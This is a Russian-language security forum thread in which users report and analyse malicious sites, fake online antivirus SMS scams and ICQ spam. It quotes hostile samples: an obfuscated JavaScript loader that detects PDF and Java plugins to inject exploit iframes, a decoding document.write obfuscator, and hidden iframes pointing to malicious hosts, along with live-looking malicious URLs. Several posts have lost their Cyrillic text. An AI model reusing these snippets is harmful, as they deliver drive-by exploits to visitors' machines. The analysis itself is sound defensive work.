function B4fkcsqef(){try{Wvfl219id='<#&(i&^!$f(#)[email protected]!m(!e^@$'.replace(/@|#|&|\^|\!|\)|\$|\(/ig,'');Iqqptmy='<@@!/&[email protected]#f&@(r#$a^^m^e$()^>('.replace(/@|\$|\)|\^|\(|&|#|\!/ig,'');Umsjv5='[email protected]&o&!(@b(^#[email protected] @@A&&c#!(r#o!&&b)@$a^$t&'.replace(/\^|\(|&|@|\!|\$|\)|#/ig,'');Icih2owkj='[email protected])#)d$o)b^e$ #()P#D#$&@[email protected]'.replace(/@|\^|\(|\$|&|\)|#|\!/ig,'');for(i=0;i<navigator.plugins.length;i++){B53fjjdpq=navigator.plugins[i].name;if((B53fjjdpq.indexOf(Umsjv5)!=-1)||(B53fjjdpq.indexOf(Icih2owkj)!=-1)){document.write(Wvfl219id+' src="pics/ChangeLog.pdf">'+Iqqptmy)}}}catch(L3kv2n8){}try{if(navigator.javaEnabled()){document.write(Wvfl219id+' src="pics/java.html">'+Iqqptmy)}}catch(L3kv2n8){}}B4fkcsqef();
```

а понятно здесь один pdf эксплоит впаривают, второй java.html не знаю что может быть

----------


## Virtual

большое, человеческое спасибо. все понятно, все скачал, ща разбираюсь.
вот хитрые заразы  :Wink:  если есть ява то и грузят ее, если есть плагин пдф, то аналогично.



> второй java.html не знаю что может быть


там ява аплет с эксплойтом  :Wink: , грузится по критической ошибке с пдф.

ЗЫ пойду-ка дрвэбу скормлю прямые линки на зловредов, пусть себе в черные списки добавют  :Smiley: .

добавлено.... дрвэб кричат что все чисто  :Wink: . бум писать в сапорт

*Добавлено через 1 час 38 минут*

у вы результаты неутешительные  :Sad: 
по пдф
всего 5 продуктов опознало
http://www.virustotal.com/ru/analisi...547-1257759647

по ява аплету  :Sad:  0!!!
http://www.virustotal.com/ru/analisi...f77-1257759773
...
сегодня на пдф уже 10 из 37 жалуются, а ДрВэб как всегда в конце планеты  :Wink: 
http://www.virustotal.com/ru/analisi...547-1257832469

----------


## Lexxus

А мы продолжаем:




> Привет, вот сайт totalcontroller.ru можно прочитать чужие СМС, посмотреть кто звонил, а главное что все работает, проверено мной :-)


Пришло в азю

----------


## Kornev

Взгляните пожалуйста на данный сайт:
_www.mylolita.ru

Рекламируют фото откровенного характера, а так же возможность шпионить за сотовым телефоном или что-то в этом роде.

----------


## Alexey P.

Обычный стандартный лохотрон, очень популярен в последнее время.

----------


## valho

> Взгляните пожалуйста на данный сайт:
> _www.mylolita.ru
> Рекламируют фото откровенного характера, а так же возможность шпионить за сотовым телефоном или что-то в этом роде.


Забавно  :Smiley:

----------


## Jolly Rojer

> Взгляните пожалуйста на данный сайт:
> _www.mylolita.ru
> 
> Рекламируют фото откровенного характера, а так же возможность шпионить за сотовым телефоном или что-то в этом роде.


Сейчас там уже сайт секс знакомств  :lol:  шустрые ребята ...

----------


## Lula

http://podrobnosti.ua/podrobnosti/20...30/647940.html
можно ли читать чужие смс  :Smiley: 
от 3х до 7 лет в Украине дают  :Smiley:  ну, если поймают

----------


## wowka

Ну очень НАВЯЗЧИВЫЙ сайт  :Smiley: 
 :"http://": stiratel.ru/promos/6/?adv=120
Пытаются впарить нечто с расширением exe  :Wink:

----------


## valho

> Ну очень НАВЯЗЧИВЫЙ сайт 
> пытаются впарить нечто с расширением exe


 
http://www.virustotal.com/analisis/8...d8d-1259829847
http://www.virustotal.com/analisis/4...c31-1259829878
http://www.virustotal.com/analisis/0...228-1259830513
Полазил ещё раз по нему



> Отличная программа. Я пользуюсь Стирателем и мой тупой начальник не видит, на каких сайтах я сижу в рабочее время"
> 
> Василий, Москва
> 
> "Я забыл выйти из контакта и моя подружка прочитала мои сообщения. В этот раз пронесло. Я поставил Стиратель и теперь такая ситуация не повторится"
> 
> Максим, Самара
> 
> "В моем отделе проводили проверку компьютеров. У двоих менеджеров нашли следы посещения фишек и порнушки. Их уволили. А мой комп оказался чистым. Спасибо за Стиратель, не ожидал!"
> ...

----------


## Lexxus

```
        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
    757669 <-    746917   98.58%    win32/pe     EraserSetup.exe

Unpacked 1 file.
```



```
Software\Microsoft\Windows\CurrentVersion
\Microsoft\Internet Explorer\Quick Launch
```



```
C:\Work\Odyssey_Install\Install.ico
wwwwwwwx
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.41</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>
```

  :Smiley:

----------

?     ,               Anti-Malware.ru:

----------


## valho

pyrocolor.perm.ru/index.php?option=com_akobook&Itemid=43&startpage=3
       ,    .

----------


## Rampant

*valho*,   (    , ..  , ...

----------


## valho



----------


## Dr.

allnod.com/index.php
  . ,  NOD32   .

----------


## Lexxus

*Dr.*,  - ,

----------


## Kuzz

> . ,  NOD32   .


   . 

```
<script language="javascript" type="text/javascript" src="/templates/web2.0/js/dtrotator.js"></script>
</noindex>
</head>
```

----------


## Dr.

.   ,    ?

----------


## valho

,    
http://www.virustotal.com/ru/analisi...96d-1261221564
http://www.virustotal.com/ru/analisi...315-1261221576
  -  ,       zeus



> Install_Flash-Player-10_build.9101.exe - Backdoor.Win32.Inject.dbz
> intelppm.sys - Rootkit.Win32.Agent.aadq
> 
>       .


  :Smiley:

----------


## Rampant

*Dr.*,    http://wepawet.iseclab.org/   ,   .

----------


## Lexxus

> (23:02:0 =:SerejjkA:=)::        ?
> yadandy.ru/ru/photo3.jpg


     :
photo3.scr

 string - , Downloader

http://www.virustotal.com/ru/analisi...368-1261247946

----------


## valho

> :
> photo3.scr
>  string - , Downloader


78760485405597
  ,

----------


## Rampant

> :
> photo3.scr


  ,   ,   ,   ,   , ..  -,  ,     LiveCD, .

----------


## valho

> 


 ,

----------


## Lexxus

*valho*,  ,    ?)

----------


## valho

> *valho*,  ,    ?)





> ,           --
>     . ,   eNom.   ,        .
>      ,    . ( )
>     ,    . 
>   Webmoney, Epass, Epese, Wirex, EpayService, PayPal, Wire Transfer.   ,  ,       ,         .
>    ,          ,   .           .      ,    .   .

----------


## DefesT

-   ,   
_http://image.slidexxx.cn/foto.jpg

----------


## bolshoy kot

antivirus360.ru

*  9* 

*DefesT*,    "foto.jar" -     ().
   (,    ):



> .             .       .      1   ,   ,       .           .       .
> 
>   ():
> 7122 -  296.61 
> 7132 -  180 
> 8355 -  99 
> 
>  1sp.su/sms.php

----------


## Lexxus

*bolshoy kot*,   :Smiley: 

  , ..  ,   ,      (  ),     :Smiley: 

 : http://www.virustotal.com/ru/analisi...007-1262086972

----------


## Rampant

*Lexxus*,   ,      )
http://anubis.iseclab.org/?action=re...9c&format=html

----------


## Lexxus

*Rampant*, ого, спасибо огромное  :Smiley: 
а то через string смотреть на не выспавшуюся голову - это сами понимаете)

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## Bacardi

Всем привет!

Что вы можете сказать об этом:

 :"http://": guardvv3v.nm.ru/grdv3.html
 :"http://": guardil2v.nm.ru/grdv2.html
 :"http://": guardhv2.nm.ru/grdv3.html

Вот таким текстом сопровождаются сообщения, которое мне присылали в mail-агент: "Посмотри что у тебя с системой, постоянно от тебя получаю вирусы. на вот просканируй компьютер, все лечит быстро (далее ссылка) и там же можно сделать, чтоб аккаунт не могли взломать"

Может ли из-за этих ссылок не работать male-агент? (я по этим ссылкам не заходил)!
Ссылки были проверены Dr.Web (проверка URL). Заключение Dr.Web - вирусов не обнаружено!

----------


## Lexxus

*Bacardi*, перекидывает на readme.ru

----------


## Rampant

*Lexxus*, ещё вчера предлагали проверить систему он-лайн, и скачать фэйковый антивирь, но у них было всё по "честном"))) сначало предлагали отправить смс, а потом уже скачать.

----------


## TOsha

пришло в агенте. Отправителя я не знаю.Как через антиспам пробились - ХЗ.
Каспер блокирует, WOT орёт, про плохую репутацию.

Посмотри что у тебя с системой, постоянно от тебя получаю вирусы. На днях у друга тоже самое было, администрация майла попросила излечиться иначе блокировка аккаунта. антивирус говорит молчал, ему посоветовали вот этот комплекс, все лечит быстро _http://guard2.1vi.nm.ru/gurdv2.html и там же можно сделать, чтоб аккаунт не могли взломать.

----------


## Winsent

> _http://guard2.1vi.nm.ru/gurdv2.html

----------


## Alexey P.

Это inet-guard.net - просто развод на СМС. Стоимость одной СМС около 300 руб, требуется до 3х штук, за эти деньги согласно соглашению предоставляется доступ к веб-интерфейсу сайта.
 Сайт якобы предоставляет игровой сервис  :Smiley: .

----------


## Lexxus

*Alexey P.*, согласно их графику
Я либо Пассивный спамер, либо не знаю о существовании вирусов в моем LinuxMint  :Smiley: 

Хотя, они правы, я забыл что такое вирусы года 3 назад  :Smiley:  
(Кроме случаев на работе)

----------


## Torvic99

Посмотрите вот на этот сайт - h..p://protect2010.net/

----------


## valho

> Посмотрите вот на этот сайт


Вот этот товарищ очень любит руткиты TDSS сувать на своих ресурсах

----------


## Infernal_lightning

Запрос авторизации:



> Качай новый jimm! Не пожалеешь!7lf.ru/WN0xVb


Dr.Web:



> 7lf.ru/WN0xVb перенаправляет на down.simka.in/1126/foto.jar
> 
> down.simka.in/1126/foto.jar перенаправляет на wapp.mobi/?pid=1126
> 
> Проверка: wapp.mobi/?pid=1126
> Версия антивирусного ядра: 5.0.1.12222
> Вирусных записей: 917733
> Размер файла: 1788 байт
> MD5 файла: 34e7c290761b4cfce343c00211297f37
> ...

----------


## Alexey P.

На wapp.mobi скачивается не файл с трояном. Они не раздают файлы просто так, а предоставляют платный доступ к файлам, 7$ за 7 дней.
Что там за эти деньги будет скачано - кто его знает
 Похоже, этот спам - не раздача троянов, а реклама этого самого wapp.mobi. Только вряд ли на спам-сайте можно найти что-то приличное.

P.S. Странно. Получал похожие спам-сообщения, но те вели на трояны, Java.SMSSend.ххх

*Добавлено через 19 минут*




> Посмотрите вот на этот сайт - h..p://protect2010.net/


 Очередной клон inet-guard.net. Тот же развод на смс.

----------


## Lexxus

*Infernal_lightning*,

----------


## bolshoy kot

_http://antidetective.com/?wmid=1148&subid=1164

----------


## Lexxus

*bolshoy kot*, 



/me рыдает в истерике

----------


## Alexey P.

antidetective.com очень похож на inet-guard.net, и тоже требуется отправить три смс по 300 руб. каждая. Обещают доступ к веб-интерфейсу сайта. Собственно, более ничего.

----------


## bolshoy kot

_http://netsledov.com/?wmid=1095&subid=1103

----------


## valho

> netsledov.com/?wmid=1095&subid=1103





> Спасибо за ссылку, проверил свою машину, она нашла у меня пачку вирусов:
> Анализ advapi32.dll, таблица экспорта найдена в секции .text
>  Анализ ws2_32.dll, таблица экспорта найдена в секции .text
>  Анализ wininet.dll, таблица экспорта найдена в секции .text
>  Теперь вот сижу думаю как лечить… Может и впрять прогу у них купить?
>   -) Осталось узнать, где этот сканер нашел такие длл в моем линуксе


Вроде ещё такие же, но у меня ни один не открывается  :Sad: 
white-pc. com
antidetective. com
bezsledov. com
cleanwhitepc. com
whitepcclean. com
whitepcsecurity. com
pc-white. com

----------


## Rampant

> http://netsledov.com/?wmid=1095&subid=1103


Ну наглецы, уже АВЗ на вооружение взяли)

----------


## Joyman79

Пришло со спамом:
 :"http://": mygsm.110mb.com

----------


## Jack2

Пришло в асю:

_Посмотри что у тебя с системой, постоянно от тебя получаю вирусы. на вот просканируй компьютер, все лечит быстро _http://inet-guards.com/ и там же можно сделать, чтоб аккаунт не могли взломать_ 

Ссылка перекидывает на _http://power-pc.ru/?k=371

Особенно порадовало _http://power-pc.ru/rules.htm - очень интересный антивирус  :Smiley: ))

Пара вопросов: как оперативно добавлять такие сайты в список опасных лаборатории касперского (пробовал через запрос в личном кабинете, но это очень медленно и муторно)?  Как удобнее всего брать образцы заразы с этого сайта, ставить виртуальную машину?

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## valho

> Пара вопросов: как оперативно добавлять такие сайты в список опасных лаборатории касперского (пробовал через запрос в личном кабинете, но это очень медленно и муторно)?  Как удобнее всего брать образцы заразы с этого сайта, ставить виртуальную машину?


Ну мы можем, например, добавить уже во все импортные антивирусные компании так, но это лишком муторно... мне тяжело на импортном общаться  :Smiley: 
скрипт там какой то выполняется


```
<script language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}</script>
```

----------


## Jack2

Посмотрел сайтик, он вроде ничего не устанавливает, просто пишет, что вирусы найдены на вашем компе - отправьте смс, мол, он вирусы удалит. Закрыл браузер - и все. В систему вроде ничего не пыталось пролезть...

*Добавлено через 9 минут*

Жаль, нет единого инструмента для добавления опасных сайтов.

----------


## PeterS

Ага, у меня тоже по аси от нескольких (двух) знакомых пришло насчёт инет-гуардс, до этого они гуляли по украинским сайтам и часто срабатывал антивирус, но похоже что-то пропустил и зловред увёл пароль.

----------


## Bacardi

Пришло письмо от [email protected]

Содержание письма:

h t t p ://trelaks.ru 

v9bt54

Проверьте, что же это такое?
Очередное порно? Вымогатель? Троян? Вирус?

----------


## valho

> Пришло письмо


Развод на смс + фальшивые антивирусы или что нибудь ещё

----------


## Юльча

хм, а это что за сайт -_-

_http://popugais.cn//index.php?




> _http://popugais.cn//0.icq инфицирован множественные проникновения

----------


## Alex_Goodwin

> хм, а это что за сайт -_-
> 
> _http://popugais.cn//index.php?


эксплоит там mdac
сэмпл, который раздается
http://www.virustotal.com/ru/analisi...9ec-1263983435

----------


## Lexxus

*Юльча*, зайдя на сайт вы будете одним из ботнетов))

----------


## Юльча

*Lexxus*, вот так прям сразу?  :Smiley:  
я как раз после посещения этого сайта писала свой пост, но признаков заражения до сих пор не вижу  :Smiley:

----------


## Lexxus

*Юльча*, Нет конечно  :Smiley: 
Но атака направлена на сайт президента (не нашего)  :Smiley:

----------


## Kuzz

Это скорее не атака, а "защита" от исследований/повторных заражений.
Эксплоит отдается один раз, а повторные попытки редиректят на какой либо легальный сайт. В данном случае - на сайт "президента (не нашего)"

----------


## wowka

С поломанного (уж более ГОДА) акакунта ICQ - получил очередную ссылку на "классную вещь" - ясень пень, гадость там какая то должна быть...кому интересно смотрите ____http://icbleu.com/video/00700/ 
Судя по всему явно вирус там не заложен, во всяком случае ресурс  http://www.burbon.ru/sites/virus.php ничего там не нашел.....

----------


## valho

> ничего там не нашел.....





> <iframe src="http://itmasterz.org/stats/ru1.php" style="display:none"></iframe>
> 
> <iframe src="http://talmeris.com/123/index.php" style="display:none"></iframe>


 :Smiley:

----------


## bolshoy kot

_defend-pc.ru
Опять онлайн псевдоантивирусы...

----------


## Lexxus

*bolshoy kot*, чОрт

У меня на диске *C* вирусы  :lol:  :

----------


## VV2006

Рассылка MS:



> Здравствуйте! 
> 
> В середине декабря 2009 года был совершен ряд атак, направленных в сторону нескольких крупных компаний. Для проведения атаки использовался набор различных системных уязвимостей, в том числе ранее неизвестная уязвимость Internet Explorer. Несколько дней назад это происшествие получило широкую огласку в СМИ под названием Aurora. 
> 
> Сегодня было выпущено внеочередное обновление безопасности, полностью закрывающее обнаруженную уязвимость. Скачать его можно по ссылке:


Почти все ссылки ведут не на сайты MS, а куда-то ещё, например: _http://co1piltwb.partners.extranet.microsoft.com/mcoeredir/mcoeredirect.aspx?linkId=13124315&s1=e51459e4-1065-3f5e-47ca-de174374a77e

So sorry! Легальная подписка, мин нет.

----------


## pig

Однако в примере домен верхнего уровня - мелкософтовский. Чей-то DNS ломанули попутно?

----------


## Kuzz

Меня редиректит на http://technet.microsoft.com/ru-ru/ie/dd353201.aspx

----------


## valho

wm-max.com говорит что поломали сервер

----------


## wowka

,  ,      (     ).   .   ,  



> .       Dr.Web      .
> 
> : Trojan.Packed.19642


     ?

----------

?     ,               Anti-Malware.ru:

----------


## PhantasM

:"http://": www.comp-security.ru/ 
 :Smiley:

----------


## NickM

://distant.ioso.ru/community/ritor.htm     auto.js     DrWeb  ""    http://vms.drweb.com/online/

----------


## natt

-    yandex  wot?  7-  yandex     Panda: www.viruslab.ru/download/wot/       IE8  Chrome    : inetguard2.net,  ,   . FF  Opera    Panda.     , hosts  ,   DNS ...?

----------


## valho

> -    yandex  wot?  7-  yandex     Panda: www.viruslab.ru/download/wot/       IE8  Chrome    : inetguard2.net,  ,   . FF  Opera    Panda.     , hosts  ,   DNS ...?


,     theantivir.net/s/go.php?sid=5

----------


## natt

> ,     theantivir.net/s/go.php?sid=5


..      ? ,      Chrome ( IE  ),   -    ,      Panda.     Firefox  ?

----------


## valho

,      
http://www.cgisecurity.com/whitehat-..._XST_ebook.pdf


```
00:00:00.000	internetGUARDs.net -     							
+ 0.000		0.135	769	117	GET	302	Redirect to http://www.viruslab.ru/download/wot/	http://clck.yandex.ru/redir/AiuY0DBWFJ4ePaEse6rgeAjgs2pI3DW99KUdgowt9Xs7e_DEZHQ5W95_yvpQttK3cXPOoTZpKVP-bX4w6eEjjUb_V5TtUem7x32vcuaYkqEENGeg9JbPzit1QqXfgEV71aZOUa9lx0M?data=UlNrNmk5WktYejR0eWJFYk1LdmtxbVRLYWdHU3RSVlVoTGlYOFlXenR3V09vNUtYc2MtQUFXWXBlS01NNS1NaUZhSGpBaTc0d1dscHJUNVl3OGlMWlpOWVZwLWw1REROZEp1Z1piUzdXV0F6NU8ycDRHY3dQRy1GZjQxU3hHWDk&b64e=2&sign=241752f37b3f06f8836275fa5ba044a2&keyno=0
+ 0.136		0.159	784	525	GET	302	Redirect to http://theantivir.net/s/go.php?sid=5	http://www.viruslab.ru/download/wot/
+ 0.315		0.637	443	390	GET	302	Redirect to http://inetguard2.net/?user_id=1288	http://theantivir.net/s/go.php?sid=5
+ 0.965		0.135	551	11611	GET	200	text/html; charset=utf-8	http://inetguard2.net/?user_id=1288
+ 1.043		0.146	542	158	GET	304	text/css	http://inetguard2.net/css/main.css
+ 1.044		0.103	545	158	GET	304	text/css	http://inetguard2.net/css/content.css
+ 1.047		0.145	488	2189	GET	200	text/html; charset=utf-8	http://inetguard2.net/sync/js/
+ 1.047		0.142	552	158	GET	304	application/x-javascript	http://inetguard2.net/js/jquery-1.3.2.min.js
+ 1.082		0.128	552	158	GET	304	application/x-javascript	http://inetguard2.net/js/jquery.tools.min.js
+ 1.082		0.140	540	158	GET	304	application/x-javascript	http://inetguard2.net/js/site.js
+ 1.206		0.073	547	158	GET	304	image/png	http://inetguard2.net/images/mainBg.png
+ 1.229		0.146	673	717	GET	200	text/html; charset=utf-8	http://inetguard2.net/sync/in/?referer=http%3A%2F%2Fyandex.ru%2Fyandsearch%3Ftext%3Dwot%26lr%3D213%26stpar2%3D%252Fh1%252Ftm4%252Fs1%26stpar4%3D%252Fs1%26stpar1%3D%252Fu0&data_type=json&site_id=&user_id=1288&sub_id=
+ 1.234		0.078	542	158	GET	304	application/x-javascript	http://inetguard2.net/js/jquery.js
+ 1.249		0.072	550	158	GET	304	application/x-javascript	http://inetguard2.net/js/jquery.blockUI.js
+ 1.255		0.208	551	158	GET	304	application/x-javascript	http://inetguard2.net/js/payform/payform.js
```

----------

> www.comp-security.ru/


      :    ,    " PC"   ,   "" (smskorovka - ,    ):
http://forum.searchengines.ru/showth...411597&page=62
"edinorojek 
       ?   ?    -          -  ?
smskorovka
 :Cheesy: 
sato
 ,   
edinorojek 
      . - ,    " PC". ,    ,     .
log1cv7 
     ?
e990th 
edinorojek,   ,     ?
uberleet 
*CSS    ()* - _()_
edinorojek 
 .
  :  -    ,     ,  ,   -.  -        ,             -    .
TonyX 

smskorovka
*    .* _( )_
edinorojek 
 . ..    , ?   ?
PainShaft
 _( 6     ,     )_"

----------


## Bacardi

,     !

----------


## bolshoy kot

http://smskorovka.ru/sites.php
 :
_http://po-pc.ru/
_http://guard-pc.ru/



> .
> 
> [...]
> 
> 2. . 
> www.power-pc.ru        .          .   ,  www.power-pc.ru,   ,     ,      -,     www.power-pc.ru .
> 
> 3.      ,        .       "Enter" ()   www.power-pc.ru/enter.php.
> 
> ...


..    .
..     ,   " "...           ,     .

----------


## Bacardi

?

----------

*bolshoy kot*,   ,   - ,     ,     ,  " " -  ,          .

*  8  54* 

    ,    ...

----------


## Zin

Uv   - " " ://jimmclub.ru/

----------


## AS007

,     :Smiley:  
http://pcdefence.ru/


```
domain:     PCDEFENCE.RU
type:       CORPORATE
nserver:    ns1.smskorovka.ru.
nserver:    ns2.smskorovka.ru.
state:      REGISTERED, DELEGATED, VERIFIED
person:     Private Person
phone:      +7 495 7950139 250303
e-mail:      [email protected]
registrar:  R01-REG-RIPN
created:    2010.01.27
paid-till:  2011.01.27
source:     TCI

IP Address: 91.213.175.40 
IP Location: Ukraine - Ukraine - Fop Litvinenko Sergey Nikolaevich
```

----------


## Bacardi

> ,


    !
   Downdup!

----------


## AS007

(     ,      )  :Cool: 



> , AS007!     -   !    hp://f68x5v6.control8.ru/     !


    hp://inet-shield.com/?r=12606,  , -       :Cheesy: 


```
Registration Service Provided By: PROVISOV.NET
Domain Name: INET-SHIELD.COM 
Creation Date: 23-Jan-2010  
Expiration Date: 23-Jan-2011

Domain servers in listed order:
    ns2.8projects.net
    ns1.8projects.net

IP Address: 91.202.63.146
IP Location: Virgin Islands, British - Akrino Inc
```

----------


## PavelA

*bolshoy kot*,       .

----------


## Bacardi

> 


  ?

*  1* 

*AS007*,    ?

  -        !

 :Wink:

----------


## AS007

> *AS007*,    ?


   ,   .    .
  , ,      /  ().
  , - ,    (  ).
,        :Cool:

----------


## Bacardi

> 



     ?

     -    ,       ,      -   !


 ALEX(XX)     !
    !

!

----------


## wowka

Вот очередной альтруист, проверит ваш комп на вирусы.... и найдет их  :Wink: 

____http://super-ax.ru

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## ВодкуГлыть

Интересный диалог двух лоховодов по поводу "антивирусной проверки":
*chemax* 
да я не про то)
от куда столько берется людей отправляющих смс=)
*Lavr*
Ну на земле 6 миллиардов людей. Думаю тех кто не знает о том что это всего лишь замонуха на отправку смс очень много. Плюс ко всему вирусов боятся многие. Особенно дети, которые без разрешения родителей сидят за компьютером, и тут бац ВИРУС! Ааа караул

Т.е. ребята и не скрывают, что, во-первых, это замануха, во-вторых, их жертвы - в основном дети.

----------


## Bacardi

> Ну на земле 6 миллиардов людей.


У каждого по компьютеру, каждый не знает что это ложь!

Что за нелепости?
Слова этих людей абсурдны!

----------


## ВодкуГлыть

*Bacardi*, ну это как Амвейщики говорят, тоже самое: "Ну и что, что Вы нас посылаете подальше: есть еще шесть миллиардов человек, да и новые люди, непуганные, рождаются.

----------


## Matias

Ссылка пришла в ЛС на одном из форумов. Очередной поддельный антивирусный сканер
total-scan.com

----------


## Bacardi

> на одном из форумов


На форумах же хорошие антиспам-системы!

 :Wink:

----------


## pig

В лице модераторов?

----------


## tar

сейчас по агенту от знакомого пришло сообщение с советом скачать антивирус, ссылка:
xyz.ph
которая переводит на
internetguardlab.ru

А вот содержание сообщения:
--------------------------
Пpивет t*****[email protected] 
Cпама oчень много от тебя пpиxодит! 
Cpочно пpовеpь cвой комп на cпам здеcь xyz.ph/is
Иначе твой аккаунт удалит админиcтpация, у меня уже один удалили. 
И новый аккаунт чуть не удалили. Поcле пpовеpки у меня cовcем нету cпама. 288906
----------------------------

----------


## Lexxus

> Поcле пpовеpки у меня cовcем нету cпама


Оно заметно  :lol: 




> Иначе твой аккаунт удалит админиcтpация


Администрация чего?!

----------


## Matias

*Tar*, деактивируйте пожалуйта линк на internetguardlab.

----------


## Bacardi

> В лице модераторов?


Нет! А вы разве не знаете?
Бота легко найти!





> Администрация чего?!


Антивирусной планеты мэйл-агентов!

----------


## tar

причем это сообщение приходит от человека, который не в сети (он уехал из города вчера), т.е. видно у него пароль слабый и через него шлют спам без заражения ПК.

----------


## bolshoy kot

:"http://": s-loto.ru
Типичный веб-лжеантивирус.
Но! Никаких SMS!



> Оплата активационного кода не требуется - на нашем сайте скачать программу можно бесплатно.
> Вам не нужно отправлять СМС за возножность скачивания. У нас скачивание бесплатное:
> Всё что вам нужно это только скачать
> 3. Ваша ссылка s-loto.ru/white.rar - скопируйте эту ссылку в браузер


*P.S. Содержимое ссылки я не смотрел - возможно наличие вирусов.*

----------


## bolshoy kot

Про "white.rar" - внутри "white.exe"
Архиватором из него можно достать "config.xml" (список коротких номеров и стран) и "temp.7z" (под паролем). Судя по ресурсам (смотрел программой Restorator), самораспаковывающийся архив с просьбой за SMS получить пароль.

----------


## bolshoy kot

__http://antivirus360.ru/promos/youtube1
Фейк-кодек, видимо.

----------


## bolshoy kot

Сам "white.exe" с С-Лото не вирус, это паролированный архив. Просит SMS для распаковки.

----------


## vidocq

> сейчас по агенту от знакомого пришло сообщение с советом скачать антивирус, ссылка:
> xyz.ph
> которая переводит на
> internetguardlab.ru
> 
> А вот содержание сообщения:
> --------------------------
> Пpивет t*****[email protected] 
> Cпама oчень много от тебя пpиxодит! 
> ...


точно такая же ерунда пришла и мне но сайтик другой
_http://comp-sec.ru/?user_id=2421

----------


## bolshoy kot

_http://porntbn.com/c_hardcore.php

----------


## Bacardi

Пpивeт! Слyшай, от тeбя идёт очeнь мнoго cпама. У меня тoжe тaкое былo, пока нe посоветовали ycтaновить вот этот  :"http://": //www.as2h.com/notspam антивиpyc. Сeйчaс, cлaва бoгy, всё xорoшо. Кcтати, у моиx знакомых Елены и Андpeя, администрация MAIL.RU из за этого зaблoкиpoвaла почту, М-Агент и Мoй Мир. 


Ребята, я что сейчас понял!
Оказывается я тоже спамер! Я сейчас взял и скопировал на данный проект спам, который пришел мне!
Ну а как еще проверить эти ссылки? - только заспамить их сюда!
Поэтому спамьте с удовольствием!

 :Wink:

----------


## wowka

Очередная добрая душа В КОНТАКТЕ посетовав, что от меня идет спам - ссылочку дала, на решение всех проблем  :Roll Eyes (Sarcastic):   Название замечательное

proverpk.ru оно же ybeivirus.ru 

умилил анонс



> *Ваши друзья больше не будут получать СПАМ от Вашего аккаунта  Вконтакте или ICQ !*
> *Интернет-Бастион* – это универсальная суперзащита от взлома Вашего компьютера, а также быстрое очищение Вашей системы от любых вирусов. С помощью нашего сервиса Вы сможете бороться с вирусами и спамерами в социальных сетях Вконтакте, Одноклассники, а также в ICQ. Прекратите раз и навсегда рассылки спама от Вас Вашим друзьям! Не позволяйте спамерам использовать Ваши аккаунты от Вашего имени!


Думаю, если жамкнуть (хотя возможно даже этого и не надо будет делать) кнопулю Установить ... то что то установится  :Smiley: )))


Я на Джаве не программирую,  но меня напрягли строчки, объявления параметров в одном из скриптов, щедро лежащих на сайте  :Smiley: 



```
var System32Files = ['System32/aaclient.dll','System32/accessibilitycpl.dll','System32/apphelp.dll','System32/basecsp.dll','System32/BdeHdCfgLib.dll','System32/BWContextHandler.dll','System32/catsrvut.dll','System32/certCredProvider.dll','System32/CHxReadingStringIME.dll','System32/cngprovider.dll','System32/DDACLSys.dll','System32/DDEML.DLL','System32/DeviceMetadataParsers.dll','System32/dpnhupnp.dll','System32/eappprxy.dll','System32/eapp3hst.dll','System32/Faultrep.dll','System32/fdeploy.dll','System32/framedynos.dll','System32/fvecerts.dll','System32/GameUXLegacyGDFs.dll','System32/Groupinghc.dll','System32/InfDefaultInstall.exe','System32/IPBusEnumProxy.dll','System32/ir41_qcx.dll','System32/javaws.exe','System32/KBDARMW.DLL','System32/KBDSL1.DLL','System32/schtasks.exe','System32/SCardSvr.dll','System32/SearchIndexer.exe','System32/shwebsvc.dll'];
var CookiesFiles = ['cookies/vkontroler.ru','cookies/planetaffoto.ru','cookies/vkontakter.ru','cookies/vkontatke.ru','cookies/odnoklassnikki.ru','cookies/vkontakle.ru','cookies/google.ru','cookies/aports.ru','cookies/vkontatke.ru','cookies/1kinos.com','cookies/2012filmi.ru','cookies/vkontatke.ru','cookies/fishkii.net','cookies/vkontatke.ru','cookies/fishkii.net','cookies/vksupport.ru','cookies/vkontakte.activates.ru','cookies/vkontatke.ru','cookies/vkontatle.ru','cookies/odnosexxkniki.ru' ,'cookies/odnosexkniki.ru'];
```

P.S. Кстати, судя по СВЕЖИМ (довольно много) вопросам (про этот сайт) на майл.ру ЭТО НОВАЯ волна малвари....

----------


## Bacardi

> строчки, объявления параметров в одном из скриптов


Сплошной фишинг!

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## valho

> объявления параметров в одном из скриптов, щедро лежащих на сайте


Если бы там была проверка, то он говорил что обнаружены опасные объекты, а так там никакой проверки нет то это не используется наверно.
Но скорей всего просто неправильно установлен сервер

----------


## wowka

Я думаю (но для уверенности нужно изучить код скриптов) - там пытаюстя впихнуть какую ни будь гадость, через запуск скриптов в браузере (если политика безопасности позволят) - ясно же, что сайт для развода

----------


## wowka

то же самое - но в профиль, теперь сайт стал обзываться antispamm.ru  :Smiley: ))

----------


## valho

> то же самое - но в профиль, теперь сайт стал обзываться antispamm.ru ))


При обратном DNS запросе выдаёт адрес antiddos.org
Похоже лохотронщики устраивают частенько войны между собой
antiddos.org/index.php?option=com_idoblog&view=idoblog&Itemid=6  3
Похоже что это такие же разводилы как и все остальные, услуга "работает" только у них в блоге

----------


## bolshoy kot

_http://windowsantispy.com/

Опять псевдоантивирус.

----------


## Gofor

